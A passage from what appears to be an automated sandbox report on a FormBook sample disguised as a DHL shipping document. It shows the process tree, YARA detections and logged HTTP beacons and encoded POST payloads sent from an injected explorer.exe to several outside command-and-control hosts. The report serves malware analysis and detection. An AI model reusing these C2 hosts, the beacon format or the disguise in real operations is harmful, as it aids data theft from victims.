2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.449699199.192.28.11080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:13.420032024 CET105OUTGET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1
                                                            Host: www.getpay.life
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:13.697813988 CET106INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:28:13 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.449700217.160.0.3280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:18.788455009 CET107OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.espisys-technology.com
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.espisys-technology.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.espisys-technology.com/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 4b 54 46 63 75 44 4e 65 36 42 4a 62 39 74 7e 33 75 72 4f 55 37 33 69 76 66 52 43 4d 6b 52 33 33 59 65 33 41 76 32 6e 45 7a 62 37 42 51 6e 59 69 62 31 4a 4f 65 6c 73 78 53 33 67 65 65 2d 7a 6b 56 48 68 32 64 44 57 77 50 6f 44 58 56 51 36 31 47 36 68 35 4d 76 74 61 6c 37 46 72 34 44 74 68 46 71 75 65 65 72 69 34 65 71 64 35 4f 35 6d 58 79 69 4a 34 66 66 61 4c 79 71 42 56 6c 6a 28 63 55 4b 6e 74 7a 42 47 4a 4d 64 54 47 7e 34 56 67 7e 4d 79 50 38 48 31 32 47 36 35 63 52 6f 58 30 73 5f 5a 6f 61 34 69 6d 52 39 64 5f 37 6c 58 72 6f 67 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=KTFcuDNe6BJb9t~3urOU73ivfRCMkR33Ye3Av2nEzb7BQnYib1JOelsxS3gee-zkVHh2dDWwPoDXVQ61G6h5Mvtal7Fr4DthFqueeri4eqd5O5mXyiJ4ffaLyqBVlj(cUKntzBGJMdTG~4Vg~MyP8H12G65cRoX0s_Zoa4imR9d_7lXrog).
                                                            Mar 20, 2023 11:28:18.816607952 CET108INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Mon, 20 Mar 2023 10:28:18 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.449701217.160.0.3280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:21.341408014 CET109OUTGET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1
                                                            Host: www.espisys-technology.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:21.374430895 CET110INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 837
                                                            Connection: close
                                                            Date: Mon, 20 Mar 2023 10:28:21 GMT
                                                            Server: Apache
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            7192.168.2.449702113.52.135.19380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:26.623491049 CET111OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.on-smooth.com
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.on-smooth.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.on-smooth.com/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 47 6c 70 61 49 4f 35 48 43 67 37 6e 71 45 7e 55 4c 72 45 79 44 68 53 6d 43 36 5a 70 6c 6f 4d 5a 52 67 5a 6d 4d 37 6b 6e 44 70 4f 37 28 56 4f 57 4c 53 37 6c 53 42 74 6c 49 51 65 33 62 33 62 65 6e 66 4b 50 52 67 64 68 6f 64 43 75 37 64 6e 57 68 30 33 35 4a 61 36 57 41 2d 72 72 59 52 6d 7a 51 72 4a 42 78 38 61 48 41 57 6f 41 64 48 65 4b 34 59 42 54 39 31 48 36 64 77 44 33 4c 4a 58 45 39 31 49 75 79 39 61 63 5a 63 28 48 4d 6f 74 79 51 43 74 38 45 6b 6a 6c 4f 56 67 71 37 48 6e 7a 53 4a 67 4b 56 78 41 77 57 5a 6b 42 6c 32 6d 54 61 41 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=GlpaIO5HCg7nqE~ULrEyDhSmC6ZploMZRgZmM7knDpO7(VOWLS7lSBtlIQe3b3benfKPRgdhodCu7dnWh035Ja6WA-rrYRmzQrJBx8aHAWoAdHeK4YBT91H6dwD3LJXE91Iuy9acZc(HMotyQCt8EkjlOVgq7HnzSJgKVxAwWZkBl2mTaA).
                                                            Mar 20, 2023 11:28:26.827330112 CET111INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:28:23 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8192.168.2.449703113.52.135.19380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:29.350188017 CET112OUTGET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1
                                                            Host: www.on-smooth.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:29.553384066 CET113INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:28:26 GMT
                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9192.168.2.44970446.23.69.4480C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:34.700421095 CET114OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.luxgudonu.store
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.luxgudonu.store
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.luxgudonu.store/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 44 68 6d 66 6b 65 57 38 47 51 4d 49 36 59 72 75 31 79 4a 4a 6d 31 62 51 73 37 73 4f 61 65 44 4b 6a 63 48 70 7a 64 79 6d 54 36 31 35 62 6e 41 32 46 4b 61 2d 53 6e 54 68 6e 39 4d 6b 73 50 4c 48 77 4b 71 54 6a 63 42 51 51 4c 4b 33 43 47 6a 58 78 77 50 71 6b 73 4a 5f 4f 66 7a 37 66 65 48 76 6c 32 52 7a 66 5a 74 33 6f 4f 76 76 63 67 47 37 75 6a 62 48 30 69 4e 6e 64 67 6c 73 55 51 52 32 7a 43 31 43 53 67 75 77 62 33 6c 2d 44 55 54 56 50 30 49 6f 28 57 6b 53 58 6a 68 56 54 67 41 67 37 35 57 71 30 69 4b 31 64 4b 31 6d 55 6f 39 53 63 41 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=DhmfkeW8GQMI6Yru1yJJm1bQs7sOaeDKjcHpzdymT615bnA2FKa-SnThn9MksPLHwKqTjcBQQLK3CGjXxwPqksJ_Ofz7feHvl2RzfZt3oOvvcgG7ujbH0iNndglsUQR2zC1CSguwb3l-DUTVP0Io(WkSXjhVTgAg75Wq0iK1dK1mUo9ScA).
                                                            Mar 20, 2023 11:28:34.733566046 CET115INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 20 Mar 2023 10:28:34 GMT
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 498
                                                            Connection: close
                                                            Last-Modified: Mon, 01 Dec 2014 15:11:20 GMT
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:27:07
                                                            Start date:20/03/2023
                                                            Path:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
                                                            Imagebase:0x400000
                                                            File size:730562 bytes
                                                            MD5 hash:04F5C33C1D3F795872B58F8C3922B49E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Target ID:1
                                                            Start time:11:27:07
                                                            Start date:20/03/2023
                                                            Path:C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy
                                                            Imagebase:0x400000
                                                            File size:95744 bytes
                                                            MD5 hash:52BD228566EE8DDE1E37102049937D69
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            General

                                                            Target ID:2
                                                            Start time:11:27:07
                                                            Start date:20/03/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:3
                                                            Start time:11:27:08
                                                            Start date:20/03/2023
                                                            Path:C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
                                                            Imagebase:0x400000
                                                            File size:95744 bytes
                                                            MD5 hash:52BD228566EE8DDE1E37102049937D69
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            Reputation:low

                                                            General

                                                            Target ID:4
                                                            Start time:11:27:13
                                                            Start date:20/03/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff618f60000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:5
                                                            Start time:11:27:25
                                                            Start date:20/03/2023
                                                            Path:C:\Windows\SysWOW64\help.exe
